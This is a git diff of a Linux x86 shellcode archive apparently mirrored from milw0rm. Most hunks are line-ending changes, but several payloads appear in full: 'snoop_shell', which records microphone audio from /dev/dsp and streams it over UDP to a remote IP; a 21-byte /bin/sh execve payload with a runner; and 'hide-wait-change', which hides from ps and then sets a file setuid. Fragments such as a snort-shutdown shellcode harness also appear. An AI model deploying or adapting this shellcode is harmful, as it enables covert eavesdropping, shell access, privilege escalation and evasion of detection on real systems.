-"\x89\xd8" //mov %ebx,%eax -"\xb0\x03" //mov $0x3,%al -"\x89\xc2" //mov %eax,%edx -"\x66\xba\x01\x08" //mov $0x401,%dx #registers are prepared for call to read -"\x60" //pusha #push regs - - -"\x89\x27" //mov %esp,(%edi) #store this stack pointer in the memory allocated above -/*loop:*/ // #so that we can restore it for the loop - -"\x61" //popa #pop prepared registers from stack -"\xcd\x80" //int $0x80 #call read - -"\x61" //popa #pop registers again -"\xcd\x80" //int $0x80 #call sendto - -"\x8b\x27" //mov (%edi),%esp #pulls from the memory allocated before and restores esp -"\xeb\xf6" //jmp 80483f5 -; - - - -int main() { -int *ret; -char cnull = 0; - - printf("shellcode_size: %u\n", sizeof(shellcode)); - printf("contains nulls: "); - if(!memmem(shellcode,sizeof(shellcode),&cnull,1)){ - printf("yes\n"); - }else{ - printf("no\n"); - } - - ret = (int *)&ret + 2; - (*ret) = (int)shellcode; - -} - +/* Placed the listener here http://www.milw0rm.com/down.php?id=1293 /str0ke */ + +/******************************************************************** + hey folks, this is snoop_shell, short and simply it snoops on + /dev/dsp 
and after attempting to lower the audio quality + will stream any data read on this device over a udp stream + to a remote listening client.. (source should be available at stonedcoder.org) + + the port that this will stream on is whatever the high half + of the ip address is, i figured this will always be over 1024 + so the client will be usable without root privs. + + at 172 bytes, its really bloated for shellcode, but if your + reading this anyway, you probably are just looking to have fun + with it.. + + remember you'll need to change the ip address before you + actually use it.. and if your unlucky enough to have an + ip address that contains a null.. well.. its on you to fix it.. + but you can do that by simply rotating the ipaddress by a bit or + two.. + + mov $0xE8015180,%ebx #192.168.0.116 + ror %ebx #shift right by one bit + + no more null + + + phar[at]stonedcoder[dot]org +*********************************************************************/ + + +char shellcode[] = +"\x31\xc9" //xor %ecx,%ecx +"\x51" //push %ecx # \x00 +"\x68\x2f\x64\x73\x70" //push $0x7073642f # /dsp +"\x68\x2f\x64\x65\x76" //push $0x7665642f # /dev +"\x89\xe3" //mov %esp,%ebx +"\x89\xc8" //mov %ecx,%eax +"\xb1\x02" //mov $0x2,%cl +"\xb0\x05" //mov $0x5,%al +"\xcd\x80" //int $0x80 #open /dev/dsp for reading + +"\x89\xc6" //mov %eax,%esi #preserve fd in esi + +"\x31\xc9" //xor %ecx,%ecx +"\x51" //push %ecx +"\x31\xdb" //xor %ebx,%ebx +"\xb3\x02" //mov $0x2,%bl +"\x53" //push %ebx +"\x53" //push %ebx +"\x4b" //dec %ebx +"\x89\xe1" //mov %esp,%ecx +"\x89\xd8" //mov %ebx,%eax +"\xb0\x66" //mov $0x66,%al +"\xcd\x80" //int $0x80 #create a udp socket + +"\x89\xc7" //mov %eax,%edi #preserve socket in edi + +"\xc1\xc3\x04" //rol $0x4,%ebx +"\x53" //push %ebx +"\x89\xe2" //mov %esp,%edx +"\xb9\x05\x50\x04\xc0" //mov $0xc0045005,%ecx +"\x89\xf3" //mov %esi,%ebx +"\xb0\x36" //mov $0x36,%al +"\xcd\x80" //int $0x80 #ioctl on fd SOUND_PCM_WRITE_BITS (16 bits per samle) + +"\xfe\xc0" //inc %al 
+"\x89\x04\x24" //mov %eax,(%esp) +"\xfe\xc1" //inc %cl +"\xb0\x36" //mov $0x36,%al +"\xcd\x80" //int $0x80 #ioctl on fd SOUND_PCM_WRITE_CHANNELS (1 channel) + +"\xfe\xc0" //inc %al +"\xc1\xc0\x0d" //rol $0xd,%eax +"\x89\x04\x24" //mov %eax,(%esp) +"\xc1\xc8\x04" //ror $0x8,%eax +"\xb1\x02" //mov $0x2,%cl +"\xb0\x36" //mov $0x36,%al #ioctl on fd SOUND_PCM_WRITE_RATE (8khz) +"\xcd\x80" //int $0x80 + +"\x50" //push %eax +"\x50" //push %eax +"\x89\xc2" //mov %eax,%edx + +/* prepare an area on the stack that looks like an struct in_addr */ + /*your ipv4 ip address*/ +"\xbb" "\xc0\xa8\x0f\x2e" //mov $0x7401a8c0,%ebx #your ipaddress would go here currently set to 192.168.1.116 +"\x53" //push %ebx +"\xc1\xe3\x10" //shl $0x10,%ebx +"\xb3\x02" //mov $0x2,%bl +"\x53" //push %ebx #port and family, (we'll use use the hi half of the address for a port) + +/* allocate 1025 byte buffer on the stack */ +"\x89\xe3" //mov %esp,%ebx +"\x66\xba\x01\x04" //mov $0x401,%dx #create the space on the stack (1025 bytes) +"\x29\xd4" //sub %edx,%esp + +"\x89\xe0" //mov %esp,%eax +"\x31\xc9" //xor %ecx,%ecx +"\xb1\x10" //mov $0x10,%cl +"\x51" //push %ecx +"\x53" //push %ebx +"\x31\xc9" //xor %ecx,%ecx +"\x51" //push %ecx +"\x52" //push %edx +"\x50" //push %eax +"\x57" //push %edi +"\x89\xc2" //mov %eax,%edx +"\x89\xcb" //mov %ecx,%ebx +"\x89\xc8" //mov %ecx,%eax +"\x89\xe1" //mov %esp,%ecx +"\xb3\x0b" //mov $0xb,%bl +"\xb0\x66" //mov $0x66,%al +"\x51" //push %ecx +"\x89\xe7" //mov %esp,%edi #registers and stack are prepared for call to sendto +"\x60" //pusha #push regs onto stack + +"\x89\xf3" //mov %esi,%ebx +"\x89\xd1" //mov %edx,%ecx +"\x89\xd8" //mov %ebx,%eax +"\xb0\x03" //mov $0x3,%al +"\x89\xc2" //mov %eax,%edx +"\x66\xba\x01\x08" //mov $0x401,%dx #registers are prepared for call to read +"\x60" //pusha #push regs + + +"\x89\x27" //mov %esp,(%edi) #store this stack pointer in the memory allocated above +/*loop:*/ // #so that we can restore it for the loop + +"\x61" //popa #pop prepared 
registers from stack +"\xcd\x80" //int $0x80 #call read + +"\x61" //popa #pop registers again +"\xcd\x80" //int $0x80 #call sendto + +"\x8b\x27" //mov (%edi),%esp #pulls from the memory allocated before and restores esp +"\xeb\xf6" //jmp 80483f5 +; + + + +int main() { +int *ret; +char cnull = 0; + + printf("shellcode_size: %u\n", sizeof(shellcode)); + printf("contains nulls: "); + if(!memmem(shellcode,sizeof(shellcode),&cnull,1)){ + printf("yes\n"); + }else{ + printf("no\n"); + } + + ret = (int *)&ret + 2; + (*ret) = (int)shellcode; + +} + // milw0rm.com [2005-11-04] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13409.c b/platforms/lin_x86/shellcode/13409.c index 47da93dd8..7c32c4766 100755 --- a/platforms/lin_x86/shellcode/13409.c +++ b/platforms/lin_x86/shellcode/13409.c 
@@ -1,61 +1,61 @@ -/* - lnx_binsh4.c - v1 - 21 Byte /bin/sh Opcode Array Payload - Copyright(c) 2004 c0ntex - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, - MA 02111-1307 USA -*/ - -/* - Calling: execve(/bin/sh) -*/ - -#include - -typedef char wikkid; - -wikkid oPc0d3z[] = "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" - -unsigned long grab_esp() -{ - __asm__(" - xorl %eax,%eax - movl %eax,%ebx - movl %esp,%eax - "); -} - -int main(void) -{ - unsigned long delta; - void (*pointer)(); - - delta = grab_esp(); - - fprintf(stderr, "\n[-] Stack Pointer found -> [0x%x]\n", delta); - fprintf(stderr, "\t[-] Size of payload egg -> [%d]\n", sizeof(oPc0d3z)); - - pointer=(void*)&oPc0d3z; - - while(pointer) { - fprintf(stderr, "\t[-] Payload Begin -> [0x%x]\n", pointer); - fprintf(stderr, "\t[-] Payload End -> [0x%x]\n\n", pointer+21); - pointer(); - } - - _exit(0x01); -} - +/* + lnx_binsh4.c - v1 - 21 Byte /bin/sh Opcode Array Payload + Copyright(c) 2004 c0ntex + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. 
+ + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, + MA 02111-1307 USA +*/ + +/* + Calling: execve(/bin/sh) +*/ + +#include + +typedef char wikkid; + +wikkid oPc0d3z[] = "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" + +unsigned long grab_esp() +{ + __asm__(" + xorl %eax,%eax + movl %eax,%ebx + movl %esp,%eax + "); +} + +int main(void) +{ + unsigned long delta; + void (*pointer)(); + + delta = grab_esp(); + + fprintf(stderr, "\n[-] Stack Pointer found -> [0x%x]\n", delta); + fprintf(stderr, "\t[-] Size of payload egg -> [%d]\n", sizeof(oPc0d3z)); + + pointer=(void*)&oPc0d3z; + + while(pointer) { + fprintf(stderr, "\t[-] Payload Begin -> [0x%x]\n", pointer); + fprintf(stderr, "\t[-] Payload End -> [0x%x]\n\n", pointer+21); + pointer(); + } + + _exit(0x01); +} + // milw0rm.com [2005-09-15] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13410.s b/platforms/lin_x86/shellcode/13410.s index 0ddbb13c0..01321a1f1 100755 --- a/platforms/lin_x86/shellcode/13410.s +++ b/platforms/lin_x86/shellcode/13410.s 
@@ -1,321 +1,321 @@ -#=============================================================================================# -# hide-wait-change (final v4) # -# ------------------------------------------------------------------------------------------- # -# Author: xort (rrs@clyde.dcccd.edu) # -# Date: 09/14/2005 3:35pm # -# Type: shellcode/(x86-linux).s, (at&t) # -# Size: strlen(fake-proc-name) + strlen(file-to-change) + 187 # -# Discription: This is a shellcode that will infect a process, play some argv[0] games among # -# other tricks to hide itself from 'ps', and waits until the creation of a # -# specified file. Once this file is found to exist, its permissions are changed # -# to 04555. Original concept concived by izik. # -############################################################################################### - -.section .text - - .global _start - - ################################################################################### - ## ## - ## _start: 1) fork() a new process ## - ## 2) check to see if we are child process ## - ## 3) if we are then _exit() ## - ## ## - ################################################################################### - - - _start: - - - #-------------------------------------------# - # we start with a fork() # - #-------------------------------------------# - - push $0x02 - pop %eax - int $0x80 - - - #-------------------------------------------# - # child or parent? 
# - #-------------------------------------------# - - test %eax, %eax - je proc_name - - - #-------------------------------------------# - # parent goes exit() # - #-------------------------------------------# - - push $0x01 - pop %eax - int $0x80 - - - ################################################################################### - ## ## - ## 1) get address of "/proc/self/stat" and fix null@end ## - ## 2) open() "/proc/self/stat" ## - ## 3) read in 250 bytes from file ## - ## ## - ################################################################################### - - - #-------------------------------------------# - # grab "/proc" string location # - #-------------------------------------------# - - ret_w_proc: pop %ebx - lea 0x10(%ebx), %esi - - #-------------------------------------------# - # fix "/proc" string to include c-string # - # terminator # - #-------------------------------------------# - - incb 0xf(%ebx) - - - ################################################################################### - ## ## - ## Open "/proc/self/stat" and read in 250 bytes ## - ## ## - ################################################################################### - - - #-------------------------------------------# - # open() the file # - #-------------------------------------------# - - cdq - xor %ecx, %ecx - movb $0x5, %al - int $0x80 - - - #------------------------------------------# - # read() 250-bytes from the file into # - # ESP-250 # - #------------------------------------------# - - xchg %eax, %ebx # store fd-pointer in ebx - push $0x3 - pop %eax - movb $250, %dl - mov %esp, %ecx - sub %edx, %ecx - int $0x80 - - mov %ecx, %edi - add %eax, %edi - - - ################################################################################### - ## ## - ## 1) Get location of pointer to argv[0] from file (NF-13) ## - ## 2) Convert it to binary ## - ## 3) use that to find real argv[0]s location ## - ## 4) null-out all args with 0x0 ## - ## ## - 
################################################################################### - - - #------------------------------------------# - # scan for the decimal-string of the # - # location of argc & argv[0] # - #------------------------------------------# - - xchg %eax, %ebx - - std - push $0x20 - pop %eax - push $14 - pop %ecx - - findargs: - xchg %ecx, %ebx - repne scasb - xchg %ecx, %ebx - loop findargs - inc %edi - inc %edi - - - #------------------------------------------# - # translate string into a real number to # - # obtain pointer. # - #------------------------------------------# - - xor %eax, %eax - push $10 - pop %ebx - cld - - calcloop: - xor %edx, %edx - movb (%edi), %cl - subl $0x30, %ecx - addl %ecx, %eax - inc %edi - cmpb $0x20, (%edi) - je done_gotnum - mul %ebx - jmp calcloop - - - #------------------------------------------# - # once we have the location in memory of # - # pointers to argc,argv[0-?], and envp, # - # extract the location of argv[0] # - #------------------------------------------# - - done_gotnum: - xchg %eax, %esp - pop %edi - pop %edi - xchg %eax, %esp - - - #------------------------------------------# - # write 255 null characters past argv[0] # - # to overwrite it and any other args so ps # - # wont see them later # - #------------------------------------------# - - push %edi - movb $0xff, %cl - xor %eax, %eax - rep stosb - pop %edi - - - - ################################################################################### - ## ## - ## 1) Get location of string we are going to copy over argv[0] and fix ## - ## null@end. ## - ## 2) Call setsid() to extablish us as a process leader. ## - ## 3) Jump over strings into shellcode. 
## - ## ## - ################################################################################### - - - #------------------------------------------# - # Get string location, fix nullchar and # - # copy over argv[0], # - #------------------------------------------# - - - push %esi - dec %esi - findend: - inc %esi - inc %ecx - cmpb $0xff, (%esi) - jne findend - - incb (%esi) - pop %esi - rep movsb - - - #------------------------------------------# - # Call setsid() to establish us as a # - # process leader. # - #------------------------------------------# - - movb $66, %al - int $0x80 - - mov %esi, %edi - xchg %eax, %edx - - dec %eax - mov %eax, %ecx - repne scasb - - incb -1(%edi) - - - #------------------------------------------# - # Jump over strings into shellcode # - #------------------------------------------# - - jmp *%edi - - - ################################################################################### - ## STRINGS ## - ################################################################################### - - - proc_name: - call ret_w_proc - .ascii "/proc/self/stat\xff" - - replace_string: - .ascii "haha\xff" - - filename: - .ascii "/tmp/foo\xff" - - - ################################################################################### - # # - # SHELLCODE # - # 1) call nanosleep(60) # - # 2) check to see if FILENAME exist w/ access() # - # 3) if it does, then chmod 04555 FILENAME and exit # - # 4) _exit() # - # # - ################################################################################### - - shellcode: - push $60 - - checkforfile: - inc %eax - - #------------------------------------------# - # nanosleep(%edi) # - #------------------------------------------# - mov %esp, %ecx - mov %esp, %ecx - mov %esp, %ebx - xorb $0xa2, %al - int $0x80 - - - #------------------------------------------# - # access((%esi),0) # - #------------------------------------------# - - xor %ecx, %ecx - mov %esi, %ebx - xorb $0x21, %al - int $0x80 - - test %eax, %eax - jne 
checkforfile - - - #------------------------------------------# - # chmod((%esi),04555) # - #------------------------------------------# - - movb $0xf, %al - movw $0x96d, %cx - int $0x80 - - - #------------------------------------------# - # _exit() # - #------------------------------------------# - - inc %eax - int $0x80 - - +#=============================================================================================# +# hide-wait-change (final v4) # +# ------------------------------------------------------------------------------------------- # +# Author: xort (rrs@clyde.dcccd.edu) # +# Date: 09/14/2005 3:35pm # +# Type: shellcode/(x86-linux).s, (at&t) # +# Size: strlen(fake-proc-name) + strlen(file-to-change) + 187 # +# Discription: This is a shellcode that will infect a process, play some argv[0] games among # +# other tricks to hide itself from 'ps', and waits until the creation of a # +# specified file. Once this file is found to exist, its permissions are changed # +# to 04555. Original concept concived by izik. # +############################################################################################### + +.section .text + + .global _start + + ################################################################################### + ## ## + ## _start: 1) fork() a new process ## + ## 2) check to see if we are child process ## + ## 3) if we are then _exit() ## + ## ## + ################################################################################### + + + _start: + + + #-------------------------------------------# + # we start with a fork() # + #-------------------------------------------# + + push $0x02 + pop %eax + int $0x80 + + + #-------------------------------------------# + # child or parent? 
# + #-------------------------------------------# + + test %eax, %eax + je proc_name + + + #-------------------------------------------# + # parent goes exit() # + #-------------------------------------------# + + push $0x01 + pop %eax + int $0x80 + + + ################################################################################### + ## ## + ## 1) get address of "/proc/self/stat" and fix null@end ## + ## 2) open() "/proc/self/stat" ## + ## 3) read in 250 bytes from file ## + ## ## + ################################################################################### + + + #-------------------------------------------# + # grab "/proc" string location # + #-------------------------------------------# + + ret_w_proc: pop %ebx + lea 0x10(%ebx), %esi + + #-------------------------------------------# + # fix "/proc" string to include c-string # + # terminator # + #-------------------------------------------# + + incb 0xf(%ebx) + + + ################################################################################### + ## ## + ## Open "/proc/self/stat" and read in 250 bytes ## + ## ## + ################################################################################### + + + #-------------------------------------------# + # open() the file # + #-------------------------------------------# + + cdq + xor %ecx, %ecx + movb $0x5, %al + int $0x80 + + + #------------------------------------------# + # read() 250-bytes from the file into # + # ESP-250 # + #------------------------------------------# + + xchg %eax, %ebx # store fd-pointer in ebx + push $0x3 + pop %eax + movb $250, %dl + mov %esp, %ecx + sub %edx, %ecx + int $0x80 + + mov %ecx, %edi + add %eax, %edi + + + ################################################################################### + ## ## + ## 1) Get location of pointer to argv[0] from file (NF-13) ## + ## 2) Convert it to binary ## + ## 3) use that to find real argv[0]s location ## + ## 4) null-out all args with 0x0 ## + ## ## + 
################################################################################### + + + #------------------------------------------# + # scan for the decimal-string of the # + # location of argc & argv[0] # + #------------------------------------------# + + xchg %eax, %ebx + + std + push $0x20 + pop %eax + push $14 + pop %ecx + + findargs: + xchg %ecx, %ebx + repne scasb + xchg %ecx, %ebx + loop findargs + inc %edi + inc %edi + + + #------------------------------------------# + # translate string into a real number to # + # obtain pointer. # + #------------------------------------------# + + xor %eax, %eax + push $10 + pop %ebx + cld + + calcloop: + xor %edx, %edx + movb (%edi), %cl + subl $0x30, %ecx + addl %ecx, %eax + inc %edi + cmpb $0x20, (%edi) + je done_gotnum + mul %ebx + jmp calcloop + + + #------------------------------------------# + # once we have the location in memory of # + # pointers to argc,argv[0-?], and envp, # + # extract the location of argv[0] # + #------------------------------------------# + + done_gotnum: + xchg %eax, %esp + pop %edi + pop %edi + xchg %eax, %esp + + + #------------------------------------------# + # write 255 null characters past argv[0] # + # to overwrite it and any other args so ps # + # wont see them later # + #------------------------------------------# + + push %edi + movb $0xff, %cl + xor %eax, %eax + rep stosb + pop %edi + + + + ################################################################################### + ## ## + ## 1) Get location of string we are going to copy over argv[0] and fix ## + ## null@end. ## + ## 2) Call setsid() to extablish us as a process leader. ## + ## 3) Jump over strings into shellcode. 
## + ## ## + ################################################################################### + + + #------------------------------------------# + # Get string location, fix nullchar and # + # copy over argv[0], # + #------------------------------------------# + + + push %esi + dec %esi + findend: + inc %esi + inc %ecx + cmpb $0xff, (%esi) + jne findend + + incb (%esi) + pop %esi + rep movsb + + + #------------------------------------------# + # Call setsid() to establish us as a # + # process leader. # + #------------------------------------------# + + movb $66, %al + int $0x80 + + mov %esi, %edi + xchg %eax, %edx + + dec %eax + mov %eax, %ecx + repne scasb + + incb -1(%edi) + + + #------------------------------------------# + # Jump over strings into shellcode # + #------------------------------------------# + + jmp *%edi + + + ################################################################################### + ## STRINGS ## + ################################################################################### + + + proc_name: + call ret_w_proc + .ascii "/proc/self/stat\xff" + + replace_string: + .ascii "haha\xff" + + filename: + .ascii "/tmp/foo\xff" + + + ################################################################################### + # # + # SHELLCODE # + # 1) call nanosleep(60) # + # 2) check to see if FILENAME exist w/ access() # + # 3) if it does, then chmod 04555 FILENAME and exit # + # 4) _exit() # + # # + ################################################################################### + + shellcode: + push $60 + + checkforfile: + inc %eax + + #------------------------------------------# + # nanosleep(%edi) # + #------------------------------------------# + mov %esp, %ecx + mov %esp, %ecx + mov %esp, %ebx + xorb $0xa2, %al + int $0x80 + + + #------------------------------------------# + # access((%esi),0) # + #------------------------------------------# + + xor %ecx, %ecx + mov %esi, %ebx + xorb $0x21, %al + int $0x80 + + test %eax, %eax + jne 
checkforfile + + + #------------------------------------------# + # chmod((%esi),04555) # + #------------------------------------------# + + movb $0xf, %al + movw $0x96d, %cx + int $0x80 + + + #------------------------------------------# + # _exit() # + #------------------------------------------# + + inc %eax + int $0x80 + + # milw0rm.com [2005-09-09] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13411.c b/platforms/lin_x86/shellcode/13411.c index 29d92dda9..db181cdae 100755 --- a/platforms/lin_x86/shellcode/13411.c +++ b/platforms/lin_x86/shellcode/13411.c @@ -38,6 +38,6 @@ char shellcode[]= "\x6a" // "\x03" // sleep-time "\x40\x89\xe1\x89\xe3\x34\xa2\xcd\x80\x31\xc9\x89\xf3\x34\x21\xcd" -"\x80\x85\xc0\x75\xeb\xb0\x0f\x66\xb9\x6d\x09\xcd\x80\x40\xcd\x80"; - +"\x80\x85\xc0\x75\xeb\xb0\x0f\x66\xb9\x6d\x09\xcd\x80\x40\xcd\x80"; + // milw0rm.com [2005-09-08] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13412.c b/platforms/lin_x86/shellcode/13412.c index 29460d63a..50881051e 100755 --- a/platforms/lin_x86/shellcode/13412.c +++ b/platforms/lin_x86/shellcode/13412.c @@ -126,6 +126,6 @@ int main(void) } _exit(0); -} - +} + // milw0rm.com [2005-09-04] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13413.c b/platforms/lin_x86/shellcode/13413.c index 017c4ebf2..b0b440b6b 100755 --- a/platforms/lin_x86/shellcode/13413.c +++ b/platforms/lin_x86/shellcode/13413.c @@ -126,6 +126,6 @@ int main(void) } _exit(0); -} - +} + // milw0rm.com [2005-08-25] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13414.c b/platforms/lin_x86/shellcode/13414.c index 0e6341f07..72b6e4da6 100755 --- a/platforms/lin_x86/shellcode/13414.c +++ b/platforms/lin_x86/shellcode/13414.c @@ -116,6 +116,6 @@ int main(void) } _exit(0); -} - +} + // milw0rm.com [2005-08-19] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13416.txt b/platforms/lin_x86/shellcode/13416.txt index 3c29069dd..8f3ac423b 100755 
--- a/platforms/lin_x86/shellcode/13416.txt
+++ b/platforms/lin_x86/shellcode/13416.txt
@@ -192,6 +192,6 @@ upload ( char* ip )
 close ( fd );
 close ( s );
 return ( 0 );
-}
-
+}
+
 # milw0rm.com [2005-06-19]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13417.c b/platforms/lin_x86/shellcode/13417.c
index 330657e99..96e0a6579 100755
--- a/platforms/lin_x86/shellcode/13417.c
+++ b/platforms/lin_x86/shellcode/13417.c
@@ -28,6 +28,6 @@ int main(int argc, char *argv[]) {
 printf("len:%d\n", strlen(shellcode));
 sc();
 return 0;
-}
-
+}
+
 // milw0rm.com [2004-12-26]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13418.c b/platforms/lin_x86/shellcode/13418.c
index c029d4dc8..dd2dfba1e 100755
--- a/platforms/lin_x86/shellcode/13418.c
+++ b/platforms/lin_x86/shellcode/13418.c
@@ -23,6 +23,6 @@
 "\x68shDY" /* pushl "shDY" */
 "\x68Rha0" /* pushl "Rha0" */
 /*--------------------------------------*/
-
-
+
+
 // milw0rm.com [2004-12-22]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13419.c b/platforms/lin_x86/shellcode/13419.c
index 1cfe7c624..a44cb78da 100755
--- a/platforms/lin_x86/shellcode/13419.c
+++ b/platforms/lin_x86/shellcode/13419.c
@@ -34,6 +34,6 @@
 "\x4a" /* dec %edx */
 "\x52" /* push %edx */
 /*------------------------------------------[bytes:88]-*/
-
-
+
+
 // milw0rm.com [2004-12-22]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13420.c b/platforms/lin_x86/shellcode/13420.c
index af56fd2c4..84c42f94e 100755
--- a/platforms/lin_x86/shellcode/13420.c
+++ b/platforms/lin_x86/shellcode/13420.c
@@ -33,6 +33,6 @@
 "\xa4\x02\x92\x9d" /* */
 "\x13\x02\xa3\x9c"; /* */
 /*--------------------------------------------[bytes:45]-*/
-
-
+
+
 // milw0rm.com [2004-12-22]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13421.c b/platforms/lin_x86/shellcode/13421.c
index 70b4b20d3..a701d3fa0 100755
--- a/platforms/lin_x86/shellcode/13421.c
+++ b/platforms/lin_x86/shellcode/13421.c
@@ -42,6 +42,6 @@
 /*--string-to-run----------------------------------------*/
 "/\x7b\x7b\x7b/\x7b\x7b" /* .string "/bin/sh" */
 /*--------------------------------------[length:51bytes]-*/
-
-
+
+
 // milw0rm.com [2004-12-22]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13422.c b/platforms/lin_x86/shellcode/13422.c
index 9bfb30dff..c3d437204 100755
--- a/platforms/lin_x86/shellcode/13422.c
+++ b/platforms/lin_x86/shellcode/13422.c
@@ -19,6 +19,6 @@ int main(){
 void (*run)()=(void *)linux;
 printf("%d bytes \n",strlen(linux));
 run();
-}
-
+}
+
 // milw0rm.com [2004-11-15]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13423.c b/platforms/lin_x86/shellcode/13423.c
index 0b533eafe..82b187506 100755
--- a/platforms/lin_x86/shellcode/13423.c
+++ b/platforms/lin_x86/shellcode/13423.c
@@ -18,6 +18,6 @@ void code() { "); } void (*ptr)() = (void(*)()) &shellcode[0];(*ptr)(); - - + + // milw0rm.com [2004-11-15]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13424.txt b/platforms/lin_x86/shellcode/13424.txt
index 469dfdb6a..93e35e56f 100755
--- a/platforms/lin_x86/shellcode/13424.txt
+++ b/platforms/lin_x86/shellcode/13424.txt
@@ -22,6 +22,6 @@ char shellc[] = /* RaiSe http://www.netsearch-ezine.com -*/ - +*/ + # milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13425.c b/platforms/lin_x86/shellcode/13425.c
index 13ec28dd8..6ec1b86b0 100755
--- a/platforms/lin_x86/shellcode/13425.c
+++ b/platforms/lin_x86/shellcode/13425.c
@@ -37,6 +37,6 @@ void main() printf("Shellcode length: %d\nExecuting..\n\n", strlen(code)); s(); -} - +} + // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13426.c b/platforms/lin_x86/shellcode/13426.c
index c0865e984..52994d869 100755
--- a/platforms/lin_x86/shellcode/13426.c
+++ b/platforms/lin_x86/shellcode/13426.c
@@ -39,6 +39,6 @@ main (void)
 code=(void(*)())shellcode;
 (void)code();
 return 0;
-}
-
+}
+
 // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13427.c b/platforms/lin_x86/shellcode/13427.c
index e370c9a8d..733444ec8 100755
--- a/platforms/lin_x86/shellcode/13427.c
+++ b/platforms/lin_x86/shellcode/13427.c
@@ -63,6 +63,6 @@ int main(void)
 ret=(int *)&ret +3;
 printf("Shellcode lenght=%d\n",strlen(shellcode));
 (*ret) = (int)shellcode;
-}
-
+}
+
 // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13428.c b/platforms/lin_x86/shellcode/13428.c
index 872bf577a..04cf4ea12 100755
--- a/platforms/lin_x86/shellcode/13428.c
+++ b/platforms/lin_x86/shellcode/13428.c
@@ -34,6 +34,6 @@ main() {
 ret=(int *)&ret+2;
 printf("Shellcode lenght=%d\n",strlen(shellcode));
 (*ret) = (int)shellcode;
-}
-
+}
+
 // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13429.c b/platforms/lin_x86/shellcode/13429.c
index dc9293c8f..30ad039a4 100755
--- a/platforms/lin_x86/shellcode/13429.c
+++ b/platforms/lin_x86/shellcode/13429.c
@@ -31,6 +31,6 @@ void main() {
 ret = (int *)&ret +2;
 printf("Shellcode lenght=%d\n",strlen(shellcode));
 (*ret) =(int)shellcode;
-}
-
+}
+
 // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13430.c b/platforms/lin_x86/shellcode/13430.c
index ecd82b74c..eafc95c06 100755
--- a/platforms/lin_x86/shellcode/13430.c
+++ b/platforms/lin_x86/shellcode/13430.c
@@ -37,6 +37,6 @@ main (void)
 code=(void(*)())shellcode;
 (void)code();
 return 0;
-}
-
+}
+
 // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13431.c b/platforms/lin_x86/shellcode/13431.c
index bc0eee2d5..dd8db4db3 100755
--- a/platforms/lin_x86/shellcode/13431.c
+++ b/platforms/lin_x86/shellcode/13431.c
@@ -29,6 +29,6 @@ int main() { void(* shutdown_snort)() = (void *)snort_shutter_shellcode ; shutdown_snort() ; -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13432.c b/platforms/lin_x86/shellcode/13432.c
index 828c18914..22716fcee 100755
--- a/platforms/lin_x86/shellcode/13432.c
+++ b/platforms/lin_x86/shellcode/13432.c
@@ -40,6 +40,6 @@ char shm[] = "\x31\xff\x31\xf6\x31\xd2\xb9\xef\xbe\xad\xde\x31\xdb\xb3\x17\x31"
 int main() {
 void (*shell)() = (void *)&shm;
 shell();
-}
-
+}
+
 // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13433.c b/platforms/lin_x86/shellcode/13433.c
index 54a456169..9e191f7a0 100755
--- a/platforms/lin_x86/shellcode/13433.c
+++ b/platforms/lin_x86/shellcode/13433.c
@@ -35,6 +35,6 @@ main() {
 ret=(int *)&ret +2;
 printf("Shellcode lenght=%d\n",strlen(shellcode));
 (*ret) = (int)shellcode;
-}
-
+}
+
 // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13434.c b/platforms/lin_x86/shellcode/13434.c
index 61360eac5..dd7c8eb0f 100755
--- a/platforms/lin_x86/shellcode/13434.c
+++ b/platforms/lin_x86/shellcode/13434.c
@@ -45,6 +45,6 @@ int main()
 int *ret;
 ret = (int *)&ret + 2;
 (*ret) = (int)shellcode;
-}
-
+}
+
